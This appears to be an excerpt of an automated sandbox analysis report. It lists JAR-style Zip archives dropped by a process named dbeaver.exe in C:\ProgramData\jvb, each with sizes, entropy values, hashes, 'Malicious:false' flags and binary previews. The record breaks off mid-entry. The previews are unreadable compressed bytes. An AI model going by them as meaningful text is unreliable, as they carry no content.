      Preview:PK..........cX................META-INF/MANIFEST.MF..[..H...M..f....UN..M_.*".(..7..J..)..T~..v......!..<.....&.....p`J...j\..V..E~c...v..r..}l....|..X...V.|~....9L..W+J......r...l.o.+..NM.../_..F|..>....y...y..p.4.w...w.<.f..MP.D...~.i...?:mr=.._3.Us.A@`._z..mU+sx.P....~..........yW..Q..Z.^..IE.8....8}.B.ir.T"@..h.PkV+.S.S...../by.W.H.....5.p.k...W@.\.!Z..$@M......./_...6.8.9....q?r.o.T+....\@...)AL.3.}..gF...z..8.V....F..e.<..z. .h......{.........XE.97c.../...[.z.."..n..X..#{S_....<Z..#AwD.-....DY...i...Eqjwue..z'...DK..r..f...3.O.<...H..PpLh.P|3.....x..R....k.H<.0i.P.3..l2.>.]....)...-...LL4..fh...sl..z..7.....t.v....;.U..M.L.1.^Z..4k&)N`J...)......i.r.c..h.'9.qF...C.^...b.;....Ka...c...X.i.-.|;W.a>=..#.O..e..>1.n......,....xO.s.Q.C)B..B..0....0Q..dEsuUP-......GB....^Q.8.5?XN....-F.r6.>w..1..y..N.]/\ .....v.<`?Q..T..^.7&../.F.V.i".e......1Yl..*.7.........U..a...|g*&..g[.-zO.....{P.t}....`.,.n^@t..Z..;~.2.!.x..+...B...-N..\;........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):30025
      Entropy (8bit):7.887750244671326
      Encrypted:false
      SSDEEP:
      MD5:5B89A88D05E79CA3F6CF772AE67E2D0C
      SHA1:CB7885673C3D04B63E51AEAEDE1FB695E46C7AAD
      SHA-256:E3125C2CA9FCD2709092676775196D5A69E44D82DE562975070E3934E52BBFF2
      SHA-512:0BCF3C5B6D401D41473ADDA592D81098506BBFE032B433925F3E566A72AC612A49AB136FD3F5A0CA2B1BF5541D13D0A5423D536E6B59AF605126B1222AAD2F3F
      Malicious:false
      Reputation:unknown
      Preview:PK........%.cX................META-INF/MANIFEST.MF.S[..8.~...`..Vw.....U..../-.......! .............w9...xh... ...Z%......a...G....?k...VI.H.J.R....n.u.V..B.A.#R,(....z7.l...;sN,.W.p.P..7..4....>.,.1.wK0....:......c..%.....9.....h.s.[.Xi..t.!. ...y.}..9|.....#...!...n...L...X(..v..).>x{u...X.E.e.f.Yd.. Mn.z6..&......A0.l.*.yQ'..(.@.JSc.q./`....KK....q.....;..."._.R....#.I%..x..........{.=..0z...5...x|.V,..W.d./...?...[.......I.'NEN.[..P.GqL`..@ .....L....e....:...7.r.s....W.#0.f.T.KS2JR..U2..m..p....V/..`.8t.....G..I8...(.h.ZJ.stu ..lbs.2Y...#u.P....,.....<5e.M.....&.....0;....o......>.V..+..+d.^........8.Cp^.:.$Bv...y..ul.g.K`z.u.6..S.4..,I...\._.lMF...:...*$... !..g..u.7./...U..D""...[7]i7../IM.......=..$.d4...g:......G};.+.2(..V...V=...t.(s.....i.w...{'...e....F...s.KSY{..U......o.#)..h....W..1.m...uG...U[...3..N.....{.{..U..PK..$s..>.......PK........&.cX................META-INF/DBEAVER.SF..K..@.F....\..(Oi5.d..KE..l&..X..T...~.....v......[.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):31636
      Entropy (8bit):7.871715125752061
      Encrypted:false
      SSDEEP:
      MD5:FF1FEF56A8CC4814240080C82370B75E
      SHA1:66D13A02EB8142EA857C185E5755B182C6A11BB1
      SHA-256:E72602F1D89B6D41FC06B1D9EAC879BE7BA563093344D08E0F2E6A0F20B5B1D1
      SHA-512:C3B2A4AFC1F012EF57E0200F0278653735E5791F61AF3FD811F5BC22976EE295C99BDCBC98AECD1D637F421B96A2E26ACC47879BDEB8E048FECD6FDC96EDE800
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.U..H.}7..0&66......N...wD....QB.....E..{..i..#f_3.sN..,T.-.........+rB6......P0|h.`.gl.\X..X.$A*VK/.Q...s....R..lF..D.~.o..aA}a......\8..7.^s............\E....(......q;...F?B.9.F......0.v.Uk..\.t.!.a....\.ft....s..ha.q.._R.L...m...r..<hEL.......3J.t.......d....L....`pN.....Z/...#b.....9.....q..E..7.l..G.e.VA%v|..Cz5T.>. ."................/...$.P..'.Sl......l..._...6....6>F<....0..+..!p s..0.f.^. .+.6b....G.9.o..d'.......$m..j...].S(.T..*...<.........y..a..@:.F..c....ig.c^..R).n*.A...S|.|J|H#..h.H.,.;I.I..~^.....M. _r....V....U......9....f.G..{...w.o..[~..|.......Bs.XY....8..X._.T...i..:LFAE..M..v.N.b...)..`...}.e..Y#../S..?....[..'.)I..W.s.T...v..2.....qP.2?{*.......@..b..K..8*........Mo_.$5..fH..Vp..t15Gp.....{O..Mj..G....J.dK.a...5...M7.............O..'L...........>V..M..(,.#w&.,k....;...JC.j(.9.O.......U..#..D.,.....Y..7.-...A........_.......J.CKv..T&...,Z....b.!{....Cc?.;j<...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):123500
      Entropy (8bit):7.940530321595004
      Encrypted:false
      SSDEEP:
      MD5:53443EE57FFE0A0DE1E386D496A2CD83
      SHA1:F2F09005F669A68AD6F5D99B252C5EFFC8DB70BE
      SHA-256:8AB3C34CC8A70A55BDA6C28177BB07D9A00FBED207CDD4A09C5FD7F287AB296D
      SHA-512:3D7E31064CB4C1630491BBF01928448FD6134617ADD9C806339B7E0AF4C2A2058035E8CD9DC0DDFE9322D72A4A43E86A9F1181FA4CB47F017E832E7C43890682
      Malicious:false
      Reputation:unknown
      Preview:PK........".cX................META-INF/MANIFEST.MF.X.n.H.}7..0........)..CR.)..&R/...Eq.7.......t,...7.X.s..R..E{P..(.(.>> O....DI...G....H~]3..||@a.....!./..G....x.mA....wl....?.3M.$.Q......~....y..N+.<-..b...u..^.D......qTUO_.@W?.......0.......z.w..O..=...].H.[...h......NMT..mo.H/t.}e..:%..Q...=xQ....O%.]..................p<)...|.@..Sxe.._G.[..Q.N.C..C... /......#..U.........n...G~|.un....P....B...n.<.w..c..W!\...........................'...:...O......}Z.../...}..'........^.A...@h.....3 t....._.}....s..t.~Dq.q........-...I.N....1cS.x:.v.j......o.E.Q...'.B~.#....?p.l.....Y..-.t1.Q.,..e~......O..R.......vpG...A7=...* ...S4ly.,.;.$.?3.SQ..(....Vf.2..<.4...2..Ej...7.F=.-97y.......+..c....Q...t...CY(..X..#..X.!..U/D...........I\.p OA]...4.w/.y.2^... ."v.3.9..c.]9GIYMy7..`.k..!~.....|b.CzI...a.3.E......)M.2U...*....=....7KoL.~.........]....A//..L..J.....J*^..#I.WU{.ezwrn..........W.ui..B.WVPc......9....eU....f.f..J....~,F..7..F"m.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):40488
      Entropy (8bit):7.897157579521661
      Encrypted:false
      SSDEEP:
      MD5:0801BDAE55D7213FAB2B2327AB2AFC3D
      SHA1:E529CCBABC8A8B820C825359A9532EC6135E6244
      SHA-256:22340ABAF9BEC53AC649E71FE8F0EB695C8F8C96C9AE69A27AED01AB6B7F957C
      SHA-512:362DE12D05C6793CE68D71871D47FAC72DB25D6A2782FA2BF44534C82B51D63C6B844782E9171D2EA9E7C68319EBFC3BA357A1586885F2F0242E7E94505A95D9
      Malicious:false
      Reputation:unknown
      Preview:PK........".cX................META-INF/MANIFEST.MF.U[..H.~....l6.q..T.I? (`...6...R@..X\D......q&.[...|.sN1.0.`.5V..(..V.~|..(r.#7l..:U..=.@[.\ch..Y.mu....?<.\.Z.$M.?>..Z.t...s.F.1yG..3..u...ojBb9..).jP.....y...9.....M......Y3@...".G0.P^2..k..E7[,....s..F.JaC..\.s..s.....K..lOt...o.....C.g.>. .JBp2TXY.V?I.<.....%..ibL...Yi.[Y.\...<..U%.Q.._.m...Lb.5t..-....i..Vb.(BYE8N}..WM.$./_....=.2............OO_......(..n..4P....4$.W..\S[........|o..hn...bl.3...JV>a...Q..@.%P...J.u.@.%PJu.:n.8'.l:'..._j......y.....X.S#....S.=<$.(.).............A1..-...2..b..F..~"..&..1..).[nW.M..[.Cj3C...{m...:o.-...f....tQ..:.XZ...x...}....:..(..qm.L`..<...NLNMQ..L.9..3.!a.;.s0.<7..*....Q..p.P.%"..........!..K^0..F.6....j".o...:.>.. ......y"n..y.G....8$1&8...Uw...WtB..A.&..??...D..;...C.N...9*.....lN.. .D...P.^..b...p%A.....>........."Ab..........;..~...v%..:%.u.-$.....8..6.m....[.y...S}.....[.n...w.^..Y.~\..#..3.l4#O...]_c.S...-.O..[.l..."8.K.......#.(......7.....@A
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):28401
      Entropy (8bit):7.856770992349161
      Encrypted:false
      SSDEEP:
      MD5:F92BC8D2040165CF7CC79998D78F9021
      SHA1:8B397EE088130CCD07C8EA903738CACAB1F5CA9F
      SHA-256:CD0E058E7573382F2FD83B32F011B6DCF84CF6730D0C6A564A5A75743E6077EA
      SHA-512:00F780781E4007EAD3D6FE979F52DEF265A12FE2592314244B971A611E2F280FD03B0BBEE548D33218C01947F8BD345C155F78B9D3A4C62EC9662CAF9D6349F6
      Malicious:false
      Reputation:unknown
      Preview:PK........".cX................META-INF/MANIFEST.MF..[s.J...S..`...<..f*..\UT@..2.@.......!&cR'...#.w....MO.Fk..%L3D.}.nw....E^K.6-+.n]....(.....p....].;o..}.s (a.F..j.B.C.S],.....|.3.%..0..qOC......F......!....~;.,k...}...m.9?3....5.!O.x:..6.e..7u.2a.A.[....7w}e.m.R.zm....E.g..Z.q....Y..1L.{.!.9*A^............{$}Ol@..8.@..@..7j.P.$.Or[u..).K..{...8(By-.d>jC.s].....?n..y.=...t{S.&.@woo.\_]_.....n..z..*....5D~}......Y.x&.:..qvCO>..)....U.N.B......Z>u.O..j..|.7.r....~..}..3..cbx=.].vQ....I`w...kJi..&.Yq.=.....2...L9...y...$.i...H..J....:.4.v.i.......0.>.{j..v_...".i.../6.W:cL3.*...b...(...8.c....<...c........UJMK|..V.mE.zL.~......n.#n.."|.7....E.@...{.<lZ.rI.N.sd...Ho}..+K.f.v.....D.....R:.>..$.[q.D.)c..N...x.1.g.+>.....\...h.f.!.gW.f../...g....&4....{....#/}.r........).ea.....|..+n..Z.7\..tn.9./...r.sp|.....z.-.NM#..X.z.y....[.S..YS..z.....9.H........lG....)c8L.....i$K.. .>.Y?......=t..c_W..PW#.....l.f....r..R.;..z9vGs>XU....i....vX{VH"d
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):79702
      Entropy (8bit):7.887413138340253
      Encrypted:false
      SSDEEP:
      MD5:FE822D0BBC2AEA6058D544C5E8D0EEF6
      SHA1:9BB921F9125009985450B5DC004EF8E8DEA05073
      SHA-256:A56D4170E60AA8523288289C61AD0AAA19BDE485AC9379A22F0C81A633227311
      SHA-512:A2248544D7A6DD08DA1035A07BCFA755B78DBB1BF64E12D1505660DCE7ECD8D6B406882EA4984102638DC8E0374FCE98EECA07D26F676F306EE195D1DE7FF35B
      Malicious:false
      Reputation:unknown
      Preview:PK........E.cX................META-INF/MANIFEST.MF.X.r...}w...11qc:..M.RO....b..$...RB...I...-...z.m?R[...u...-....*.....|.]_1M...R.....A.il.......C..H..>..o...M.....A.__..pk...g.,H...h..0.<...68.a...g.(l*...i.W..2...f.zy...}y...q....*8..a.g...`....{.....'}.3...d:...U.H...-.......4..........__..l....:o.~.......?.........5s}uS=.xe..yS..~..w[..b.V.v.W!.{W..Q..W...[..c7.....Q.VAo.n.<.-..J.4...._B...EIT.xs.F.....i.........=.}..k...:....S.>.q}u}u.Y$M.e.S.g.yG....-..}^~..k.,^.s..0....7.b...t..o%._..BC.O_N.@..@..@{/..x.>F....G.=g.9.WQ....s.?q!|...."..;e(g..@P.n.H).]..V....E2....0...aO/.\5.......M..W.I....:A^,...._....C.t..n........i.L..U.Mp,C....\........kE..T...$I...H..r.{TO..f.q.pF..Ff....o.q..*...p...YO.M.;....[.;G......w.t.....8.........@._.=...{...K.mT....k3!.|o.x...d....F.2.H..SC..1s.........Q=/.../.r$.\m......}.6'-.=7.lm.......05..j.........M.".H.l....R+....q.T.F..s.cwH|Jd.RU\.....t<...I^.%8.KX.CVZ.9...1..........C..6y..R...Sd.E..<W..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):21657
      Entropy (8bit):7.88028895044122
      Encrypted:false
      SSDEEP:
      MD5:5CCAA234F8B224E51BDABA450E364A7A
      SHA1:42CB6882730B1021B99264478E6ECB190E07216D
      SHA-256:437FFA11AFC69B6C80D84D590AF648D325943CD1D4D4EF902385A7089642ECD3
      SHA-512:3BF909BA9CC6CAA026AEF88B9B2CC3189FEA5DC496E3FA028F0716ADAAD3C298243304F5E2DA480F04ACAF92B0CAD185B8629773EBE1900DB855BE88EA4DA387
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.R.n.@.}G..PUU.\.`.RW~.._..`;._...d...BL...F.6i.>.4{f.e..1Z..KHSD.Hu.33..q.lE7.~Y./.9.`SP.Vo......L4...x..J..\.B.`.[....C.>3W.j...G.<...xMh....%.....E.......P.lQ.J.2.g.:7.MQ.b.J........-....j.A.A..N.r.....2D.x..%"".......R.W,..P.X)gr.U..s.Jj....L...7c...M....}H.B.W.m..t..cS.x.D..d.E..Y...3.9k.X.8.........9.8...c.$.C...:IC$A.u]......OW.Zk.r.Z.W.iy-E....s<W....W.y.,.H*_.jNQ....C@<...Q...;(,..).....;YM.i.:.B+v..d.(.G]=.j..%.Z..T`C..C.=.v....~....Y...:E}U#.W.....lj;w.4$8.Q,.#....@..#85.M..z.~.eQJ.A..z{.8^.....x5q.......X..w<...VJ(I.C....n.....[.<..gM.<...]hE4..q_.5...7...?._+.1..'V$.D.,..6...C..R<.x.zz2p.Y..E...../..h~....A'7.,U..r..l..s.....+...'.j...._l/...{.wZ6.Wc.Q.w..Wti......c.~g....7...'.PK..T.@.........PK..........cX................META-INF/DBEAVER.SF..O..@...&~..=..(...I....+..B...0...a....6.d..iO......;...H..F6"5...3.s... HQ8Z..`>....~G...2..g...z.G.L..q.j:.a...`.G...LM. ...@...8
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19167
      Entropy (8bit):7.866124537386565
      Encrypted:false
      SSDEEP:
      MD5:B3C74079968F70F0C42839827775A4E3
      SHA1:6C6BB6D1D8A074C1C0600FB12F4A17A5D16B1B83
      SHA-256:6FD4DD17B0492AE954FA63CCDE59B85D9BE307261258B722BFFA01FEA692BD75
      SHA-512:1F2C3DECC7485A8C0A40449F4103C60215CB0234BFFE49912D58ADFBBDB6DFE98B2C014881CEC5F12A874DFE4E91354FEB51E80016B5EACF882681CFC77B0942
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..KS.@...T..R.....y.0V..#I.. .ucu........~..L...k.}....}M....Lx.."...MQ.9=E.+L.@...E.X[....-...r..t.j&.y..!. ......A.K]Oc7..y ..V}e.=.Z..4n..#.p..I...ev..q..w9&........wL....(......g$.u...fS...V..0..B.LT........@.].....0...9.. ..h.C.(..}.rn!(.OVc.....0I..A.(.....b]....QQ..5..1....6.XZW...R..R..&v.z.?..#..$`.B.J..zH..jS..$.....C.?....g.....M....x..I.N:..'.q.q.......3.3..}p..G......+......F1._\>....@..2....|..v..Z....N..F.....].~.()J.Pg.]`.?..*)..q......p-..............gB..}._....Zx..J*.[.]*.G...^..tUUCK......rpLk...(&.......c..Cz.....f. ..y.*NK..d.|.t.s..5.G.....ZW...R[....i..}[....3.n.].Y....B..PK...G..v.......PK........ .cX................META-INF/DBEAVER.SF..Ko.@.....8.B....z0..x..}.xl.b`...0.>....i..f......%...`.Q>e~..~o..OA...P..?a...V].%L......q.p.i0..r....NL.G......\..es.H...#W..:n5..R.jn_._b:.snF).AI..2.....WwW;j.%...1lAN...,.L..]%..#.{...).p,$7H.......@C...sH!...B.........|....9q...H.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):104066
      Entropy (8bit):7.927633196841409
      Encrypted:false
      SSDEEP:
      MD5:BF8A3519511AC8BB14DC2692A3FAF204
      SHA1:B7BA7FFC6226CCD220DA2D816FC12491C37A16A7
      SHA-256:10450354C7F0F6CE311ED8C5F4E3AA15FDB926D3F8E1A223FE8E309DA68D7A98
      SHA-512:576BD09C752E1521E19F20909E9F94210E1CA3D3FB26466FBE85C45996CAE3B28B4B8726C7AD245F68DD6BC616539B95E39B1ED0E6CF434EB1EC437DF5E7E978
      Malicious:false
      Reputation:unknown
      Preview:PK........C.cX................META-INF/MANIFEST.MF.X.r...}w...1.qc&..]....$!$...$.CKi_.@_.......y..R..d...bj$....^.y...;........c;.W..j.{Ok.?...P..a....h]...w.....~z{...(.}.NW.....c.......8.`..7w.,. ?....m.Cl..o=....B.(.O.....E.E......7.e..G.W...k.].%...:Y) .F....3u.y{`...(..#...................'...m...~....WI.....1..;.-.........*~]...>[..<4.....w.8Ey...9.8.A...z:.....#.... ...z.....{a.4..8..zz.......ED..V.$.=.4ym.z:7......G....vI:.....h..4..Gm=......M1...oN_....#.^.qP...d.Lno.U...u?M.......o....+4..-............c6^...[..#.l...nk..q....?.....>....;C.....v. ..........t..=....),T.P{...B/...Y.&...6..(.SM...E.N...(A......w.....4...z..[Bu6.!.....e...^.....(..[@..(..Q..m.;'LE...,..A.B....:.F#h...M..K.?~....~...H.e|...isv 3.eP.^..%......c1..0n.`....6....}..{..r......3..'."'..Aq.....$.<.q.|.O?M.QX/TG..R....]..5.o.S6}@...)....t..~Oc..d..sb.m...9.....?.!......E..;l..d!..t.g...$..pN..(k." ..5..........IV.....K.w..5..,..H.{....iv...E..>6..h.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):478501
      Entropy (8bit):7.95913848675134
      Encrypted:false
      SSDEEP:
      MD5:8BA4F647035E1CEE044859AED2F350F8
      SHA1:85D32786298B5EDE48930C477652DB46A8142C46
      SHA-256:30BDC64AC4DD633322A7D945AFC51E2A0C2038C8DE954C29FFAC48D3941C6EF8
      SHA-512:353E31D564BBCE6B587D08FFF1451DCB8064047DB18A4A7037E4CC430963FF29D00DCCE410BB5B8279AB698DAAF63EB0FC0A0C81B43F83752C7145910041A304
      Malicious:false
      Reputation:unknown
      Preview:PK........$.cX................META-INF/MANIFEST.MF.|W...............3K.l.p).$1J._..9'Q..H..g.R...`.EQU.j.o.*.).0....A.%U..'.3../.!....?.]....p...H...O0.. ."....v..f..........._.6p.....f(.<.].2.....W[.:..y..'].>.A{.S.. .}M..........>.Y.u._&.N....?]RFy._f..o..u.o..../....... ......,.u.....'..W.].>'e........y9/?...O.hA3$m....c.^..]....s;..e....$.u[.3&].&.........Ap........w.......H...7...2..M.7...t.q...|.>-..S.y.....Q...9.LR;m......M?;...........>.oP...-...w.......x........y...w.../wAw......r...F..y.F.K.*./*CVm..%.;].8}......s...4...v:...o. ...xf...C_..7../z7...~.b../r....s..'.X..........._..)8.......Y...V........<.U.C...O.eh.#~....T.]....P.......pl.b+.../../.."X.W..X.....u...................z.`...........A....m.*.\.uLU3W|a.[8.Q....4.'N.......4..4..[.....L....I..\^.......%..\......c...9Wah...o..%..6.gA..wG.ij..j..O.r.....8....dxqP8.1.+.D...syr....5.6.O*... y...]........,un......|y..}V./p.jh.@i.1.e..b~ON/.....b{...4.".5.Y.G*"...&c..s.|l.....e.It
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):190296
      Entropy (8bit):7.913196035645571
      Encrypted:false
      SSDEEP:
      MD5:759A555D8A80D6625702363F356E883A
      SHA1:49D7CEB505C95470F2BE400F4CCF79B573126149
      SHA-256:8555BAE9944A66EF3421A4A2286B4797DADD1018F4CC03F94976417BB785A196
      SHA-512:04E26C76AB3FB9F19097B1D4FF6D9B18F03D8C6030B0C645A6A8BD74A361A3B7B15B98F9D185B2A15F58983E49BE33907B2CFCC0D06195767987629C69570743
      Malicious:false
      Reputation:unknown
      Preview:PK........B.cX................META-INF/MANIFEST.MF.Z...}w...q.q..q..!.o..@.A $&.^v0..../..m.......T.*.r.....B../.[Va......?~ .0q.pN.E.\{.\~.S.......# .....:..B..}r,.l....?~ K.].q...."|..q...y.cM...0.....~......q.<.V........8...o..}}...9.k.....O.z...l..E.....Vw?..~..&.Y._...O.<>..:l.:/_.qw...}.....{n..........E.N....v^.we........O..U?.G.i...........2.......\'...<.a.a.....8>.....d.g..h..KN+...t.......f.Ww.9....gL+]&.2.0..|w....3.i.<...yv{.c....J...<Y.r...V...Y_0.o......]0}.z9..d...yz....Kw~.g?...o...)..s...Y.\..[P.yY<>$....f...ir4..y:.d..r.y......._....c..q.]{....G..i.IXO.......7..[......?..:.7g..L.....m..-...}....#H.~S....)p.)P.yR...p.G.t..N....t....2..././....O...f.+..t..+....`..........!.......H.?...4.u.....+..:.../ZI..:a...'RmI...X.....`M...d..L...&LWu:].OX..e^...........@.NW3X{T..e..h..D`<.i.P.../........1F/...]....sS!uh.$Z....;..Y.5 .........M.....?\..._...=.....{....t...Z7)....3U.:...[}.!.<.B..%.....4.z_.m...{Oc.."....]...P..w..>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):437413
      Entropy (8bit):7.956168095346772
      Encrypted:false
      SSDEEP:
      MD5:7C264E983691242DBF9127CF37A07EAF
      SHA1:37C88B2C9A1F1192602EFE66F686DB659601B92E
      SHA-256:46B8EA4D60327FAC6C9CAF1C4A53B3CEDEB746CD4585A1DB0E9C146F6D278153
      SHA-512:5A3897804D20D85808A5CCB3B5B13DE3A52B38808869AF414D9950F017B84F53FDB37F9079FFA55DD556D62D0B8D382E422746B2675161AC01BF0BFB28A59D5B
      Malicious:false
      Reputation:unknown
      Preview:PK........).cX................META-INF/MANIFEST.MF.|..V.....1.8...Y$=..C1S.. ..Lb.b..~..;.nu....%..V.._}U....s...[q.gM..o.g.._.cVF..Q.....C..g.........B!.&./W..o.?~.....s........G..|;.Q..~....o_)......7..VC..f.m.t.k....2._.m..s^d}...J.2|...R.O..I...%.5tc........F..?....Uz\.~......m.....e.....^$..2k..s.t..n.......UM...3e}.d.........xy...?.Q.~......o?.....F...N.........NC......E....l..;l..I..t.9.........V...v...].P{.5...e....%S.}..C..o....{.....~..)."..nw..Y.o^......7.....}.?...|......T7.....h.f.o..}1~..9..>.>....o..w...?.......%..op....U..&....._~..e.,l........O...d......".;.o~g......q*.D.k{Z2....c...6.intK....Q.5.../p.......f..f.......(.|.g......].I.$pj.....EgMR.r..y....C.S.....2..d..*.~.4.r.J....J..(...Z..F].&....c.z.O..y7...&.d..e.w...a.?o..+.... .0]r.a.q..+.K:.....q.v).RW....u....V.>....6.vK.~0.3........r.y.p...W........e..i.....Y?.]3eQ..vz.8..,.`.................[.3).=.Z..E..(^.-.po.eN....i.....$..' .(....i......l.a.[........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):18868
      Entropy (8bit):7.8889882246293865
      Encrypted:false
      SSDEEP:
      MD5:93014E4B4AF848E1FD8BCD6E22DC259F
      SHA1:5ACFA69AA09670AA5504B3D090B63454A52F7697
      SHA-256:58F63C742DBF9782399A637ABF256CFA8937947D09D433C22B15F92D42900A49
      SHA-512:5EEA03FD2A0A497EFAE5F91B32C3E16BEC7C5AF8635BC151902F9265C284FE9FD9CE11C62C7D6BC441900DF37AA6661241A322A0B8AD58137D31BFBED4AB9516
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..Ks.@...V...,..rx..1.B.......].W.y..#..A1$5If......;..S..-.]A...oWEN`*.......k.`.C.e.....u....BC...5e{Y.jo...q8`*j....n.K|..;.8....N.Z........U...........m.9.O..1..............th.@..mfN...?c.U.@...jy.2y..<.>.....#..D..c6.|..U.t-.SDs...+.c......5...JP.....U..t..x.&...K.:.Z.S... ...,.9....^+PQ.6.`.c...9..m~...;W../.......\.E..Q...b*L.@.I.`.;x.js.e.R....I...h.>...g..c.Wnk.....`=../.Y..h..ew..n.S....%..../)..e-)&1g.J|...........a.zz..a..H..x...1S......{q....A.Y...h....rtL].......d....T...oMYx.P...9..0"`.....u_.-.j#....+i....B.+J2\5 ...}.7.....@.....`....f..3.lwH.....I..D6.1<w.....oPK..n...b.......PK..........cX................META-INF/DBEAVER.SF..[..@...M..\.!...h....`W.Y.r7.#...g.....6M.6&.^}o..y./.i.xM...Q..b&...~..p.Hf.(&..`*|.R.<J..1I..{.....d..1..A.O.0..:y..u....$^...*..p...;.1T....t..p!..S......y........8...}.;o-.W....Pi.q..&r.X..6 G3."u..A...i.W.v<........j.(.~.../..*.B..sw...%M........Q..\..G.;.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):51216
      Entropy (8bit):7.939151261723097
      Encrypted:false
      SSDEEP:
      MD5:2E4FB02DD6961EB8A92C3630666B78D9
      SHA1:B8764F9FACD6CD67C7E757A52A6E0A96A1BF84F1
      SHA-256:3850080E518B24DD6C883C3521B649E085EA4F3588AF4997CF4D4806F8872208
      SHA-512:68DBD51ABCAED51B02EC924C1153E8ED3D8A77DAC56D0FD2C44709BA50A8B8E5BCF0BE1441A769074C5E029B2A3B6EB0CC1F56FDBA24904D4630C9436C4FB2A7
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.TYs.J.~...`..........*.....}I5.bKC...~....g.....M.9.-.|...-!.sS.QD..L..S..a'.u..(.6+..jc......|1_,...t.k..3....F."..A.C.C.....9..|!..-..9...L. h..3..22.....~.%..=D).F.w1G..-..K.O.......(...k.\I..tv..B..N...].....$(...W...(<q>\..I..(.b...?..S.........zG...`....C.0..o?>....fH.o.......M|.%..s).....y.3.V.b.Q...e.!Q.. .v.v.O.}.cip..........D.I.^.2...@.z.p.T=....N...........B..L..........F...w..k...Q..n..Z.|..#.J......?S..P...7.n)..+.......u..N..zN.J.&r...1c...Y.u.^~....id+......<..U.j.....wA!N\.p;..D..t."..8..5.o.U..Ajv...*&.]'..4..'.(`{..~w.CJ.=..f....j".0......W^.;...U..O...J&..a.Y...W.9p$:..DB.EY....-Y.. B.w..Nb-.b"..^a.R&Ni.._I@,.'.3&.......p:.a2.-4oS......<.I.$M..rC\..A.]..G.5..m....o....x\...F1..X.yO+?.......*/.W.d%.e.xO.....Q.3..........j.-.+u.....H!..nW....].JE.V+..........5..l..;..0{...BL..Nd.b..dQ..;P..%.t.....G...R.6..;..u.qlY....O..5.....$...../.-..[B....."E.4....Z.k#;;M...3.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):58675
      Entropy (8bit):7.930936625486948
      Encrypted:false
      SSDEEP:
      MD5:9B322008C17E26BA7EB1CA0A901015DB
      SHA1:20486DB230F70842F171F1C4E5057158AB13239E
      SHA-256:93CF89C553AC7DE4C238BC969909028BDE1C029BD9C7ED3D2A5DB0B88195CA90
      SHA-512:023691C2B6E3035201B4491AE107A5B762886D5BD441EE3D4C4E49D368199783E4ECA15A2442AC6E91742C6DAFFE0A03BD2EEC02E779628D64332A63B4622E1A
      Malicious:false
      Reputation:unknown
      Preview:PK......../.cX................META-INF/MANIFEST.MF.Uk..H...I...f.... .`O:Y..*/...I.%....C../v..3.mO:;...{.=..R.q..iV.C..8..k6...)..W.y...@....c.0..w..t.n5y.9;.K....@P@....L ..*..`]{F..3.#..1...;. .@..4.At....(t..1...]....X.5...S......`V.=d$..*?..h.._;{L. .U.z.j..<{{c.}..X.J{".].&)l..........s/..7w...a.I.q.|........c\...S.?.V....5.8.y}F...U....7.c.IV7........U..gl.g...R/s..,,@V..<O.2....Y..&/.1I..2.ij.,...T...GU%.^.*.x.7t^&...8!....N.....M....?........(....x..C..........G=.Q..u.......ZiO.y..2Fy.7\...s{c+b....n.W;u.w,....x7_+x.Bb....L.3.;{......5Gh<yx.......1B.+&.m..|T..,P..l&...O.M....n.".#i..m0A ~.......T....yr..m6............R......BS#.T.S.!.)4.0..7_.Uf...j..S..bze...'..7....x.,.mi1..D....'...p..\29...p..:.qN\h.\..Y...... n.i.\[.....J).>......w......,..".lK....).$..8............|./:.Z...tu05u2..|-L..x..P.....E.w...6......R.....K.&3h+...D..9..?`r...lC....%.%..."8.f.o.+)E..0.o...."..&7...>...j.1.<>...]#!8.$...H{....T...<.....f]..b.\,.%
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):40017
      Entropy (8bit):7.902432918415545
      Encrypted:false
      SSDEEP:
      MD5:BD6611DEF2D4D2B8EDF711EB6D5D39ED
      SHA1:8AEA4CB13B6FEC68A62897873ADEBDB6FAF2934D
